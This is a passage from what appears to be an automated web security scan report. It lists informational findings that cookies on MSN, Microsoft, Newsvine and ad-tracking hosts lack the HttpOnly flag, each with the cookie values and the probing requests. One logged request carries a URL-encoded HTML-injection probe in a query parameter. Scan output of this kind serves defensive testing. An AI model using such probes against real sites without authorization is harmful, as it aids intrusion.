MUID=32E934AA60CC44708EAEB1A4EA677746; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bloglist.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.371. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/the-hitlist-blog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=70a16c71a55c4c61a3a1f7e96fd37f9b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=496C3F39553B4397A714AABA23E48508; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.372. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/videodrone-blog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=95fdb1a67d8c452591b9b1d3553ca658; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1219E6217C35489A85953685DFCF99E9; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/videodrone-blog.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.373. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.redacted
Path:	/movies/blogs/videodrone-blogpost.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=6d751073fa5b4121b2cd69496e39f021; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8104721B1DA441FBA6658BE28078FA49; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/videodrone-blogpost.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.374. http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Forums/en-US/windowsphone7series/threads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Mon, 28-Feb-2011 23:26:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Forums/en-US/windowsphone7series/threads HTTP/1.1
Host: social.msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.375. http://specials.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=85e00d6e6f6c4a778e4031e134497c88; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=63CE5261B6254DBF87870C0B65E15402; domain=.redacted; expires=Thu, 18-Aug-2011 01:50:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.376. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=47b7e33a132247bf8382137776d91eb8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=6378AE381CF74C0AB0F61F11DCCB43D6; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.377. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=a0e82ca105e74736bef180d33ad85b63; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=3D7690447A274FA6A7A5188FFB75CF63; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.378. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Famous-February-birthdays.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=af42dcb823fb4382b27164e71b4553fa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=14EF63B027F946CD907C6E5D6601CA44; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.379. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Jesse-James-ex-arrested.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=d363cc0566a641bbac227c396c72e6da; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=B5C6E6CBBD8140B1A45E68CFF623563E; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.380. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=ce8cf853b593429c8c5ae3125646c35b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=14CA8A1489AA49D39C1600720CAD343B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.381. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=b8024ffbe31247238960e8dad42e6ae0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=54B802C72C5D4A968AE6BEB7BEB43885; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.382. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Billionaires-caucus.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=509e6c71b5ba480d910bf7b7e5f60afe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=0BDAD1C110174CA4BA5911AED9744835; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Billionaires-caucus.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.383. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=115826fb361947fba7a59745eee1a2fe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=19D7523F04DB408783F64E4246E74057; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.384. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=686b26f612ef4ff886afcdf5b0daf95d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=64FF62872D864AAC8B7EAB35C97F487F; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.385. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Egypt-new-vp.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=075506e27db2457ab39ca3349aad58aa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=751919D3B46045639E5A7F4BB4D9E241; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Egypt-new-vp.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.386. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Famous-escapes.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=1609e5a58c494ff581dac6b56594c457; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=5969A2C4E44346D5AD9CAFB1687B8DC5; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Famous-escapes.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.387. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Mom-kills-teens.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=adae2bda89bb456997895c86d0995bea; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=606B6FED01FA4B74AC05FBCA266D2456; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Mom-kills-teens.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.388. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Nathan-Woods-dies.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=43c0ed9dcd59405e97e0ca56ecbc5934; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E67F9D21403E45ABB6A08727A2CBE039; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Nathan-Woods-dies.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.389. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=44c6713e16484bef8864fe79a72511ae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=FCB994723662439EA7B8A5803A9422E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.390. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Taco-Bell-fights-back.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=603578c5dd754321a5d5f718e6e3719e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=0F1C39FCE6A54EAF8026C0BE98EE9363; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:02 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.391. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=3dac27f13e6f43ddbdd099e1136b2ed6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=C971D4F5C5424720A741D6E2B244FC0D; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.392. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/TV/Reality-show-and-housewives.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=57c44e4f157449418f258835ff8a2157; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=697F387490984D5091A88C7D9264CF7B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/TV/Reality-show-and-housewives.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.393. http://specials.redacted/IEIncreaseFont_preview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/IEIncreaseFont_preview.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=0506a602688945e5ad28ee84c22b5f61; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=80780BE1B7C941D18D9BC03C02043CA7; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /IEIncreaseFont_preview.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.394. http://specials.redacted/alphabet.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/alphabet.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=f2b9f9c8edf64a949f8339bbfbc006f6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8F837BE9C6D04544883F495E86A13FAC; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alphabet.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.395. http://statse.webtrendslive.com/dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAEAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVNBAAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif?&dcsdat=1296407694920&dcssip=www.scientificamerican.com&dcsuri=/blog/observations/&dcsqry=%3F9edcb%22%3E%3Ca%3E429173c9aec=1&dcsref=http://burp/show/60&WT.co_f=173.193.214.243-2605364368.30126492&WT.vtid=173.193.214.243-2605364368.30126492&WT.vtvs=1296407694981&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Observations:%20Scientific%20American%20Blogs&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ndl=0&WT.ssl=0&WT.es=www.scientificamerican.com/blog/observations/&WT.cg_n=Scientific%20American&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAADAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNAwAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sun, 30 Jan 2011 17:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1296407694920&dcssip=www.scientificamerican.com&dcsuri=/blog/observations/&dcsqry=%3F9edcb%22%3E%3Ca%3E429173c9aec=1&dcsref=http://burp/show/60&WT.co_f=173.193.214.243-2605364368.30126492&WT.vtid=173.193.214.243-2605364368.30126492&WT.vtvs=1296407694981&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Observations:%20Scientific%20American%20Blogs&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ndl=0&WT.ssl=0&WT.es=www.scientificamerican.com/blog/observations/&WT.cg_n=Scientific%20American&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAEAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVNBAAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"

17.396. http://suzanne-choney.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://suzanne-choney.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=6046a552d588b2b1ca9c2098d0a526d4; expires=Sat, 25-Jan-2031 02:19:28 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: suzanne-choney.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.397. http://team.silverlight.net/tips-and-training/silverlight-tv-59-what-goes-into-baking-silverlight/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://team.silverlight.net
Path:	/tips-and-training/silverlight-tv-59-what-goes-into-baking-silverlight/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

graffitibot=88276BAEC15898589CE0128DE781EA8476A1CE3823C4D3FA4426E978A2FDAE634CF23B8AD0FAB134C870F690C10DFE9F670307A7E5E9060A5E8FE2F026AA4A6C2D8AD4364AF5EA28944FC7C079E1CCD15A344DB2A11751939870F26D9651152CAB5DEF057812D9394E1FE6DFD640DF20A36795453E312D77F68CDC4560698170CDD0198C914C388A31C09D86E6F3E4D9BBCECDA61E8CE8FEC911BFFAD5B4DC3CA7BD862D47665D3ECBC5FF177B083C68ECB07C25246C773E70D0A6B7E42A37DC58DC37FCB7C63095473F180490BD41E8DA4F6C86; expires=Sun, 30-Jan-2011 05:23:26 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tips-and-training/silverlight-tv-59-what-goes-into-baking-silverlight/ HTTP/1.1
Host: team.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: graffitibot=88276BAEC15898589CE0128DE781EA8476A1CE3823C4D3FA4426E978A2FDAE634CF23B8AD0FAB134C870F690C10DFE9F670307A7E5E9060A5E8FE2F026AA4A6C2D8AD4364AF5EA28944FC7C079E1CCD15A344DB2A11751939870F26D9651152CAB5DEF057812D9394E1FE6DFD640DF20A36795453E312D77F68CDC4560698170CDD0198C914C388A31C09D86E6F3E4D9BBCECDA61E8CE8FEC911BFFAD5B4DC3CA7BD862D47665D3ECBC5FF177B083C68ECB07C25246C773E70D0A6B7E42A37DC58DC37FCB7C63095473F180490BD41E8DA4F6C86; expires=Sun, 30-Jan-2011 05:23:26 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: Graffiti-Post-278=278; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:26 GMT
Connection: close
Content-Length: 13643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta content="text/html; charset=utf-8" http
...[SNIP]...

17.398. http://technolog2.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog2.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=4d47ba7c4a967234cfe2368b17e3e89b; expires=Sat, 25-Jan-2031 02:53:12 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: technolog2.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.399. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ac1=51f37.61f6d=0129111951; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0|c51F37:61F6D_0_0_0_20BC47_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:08 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.400. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
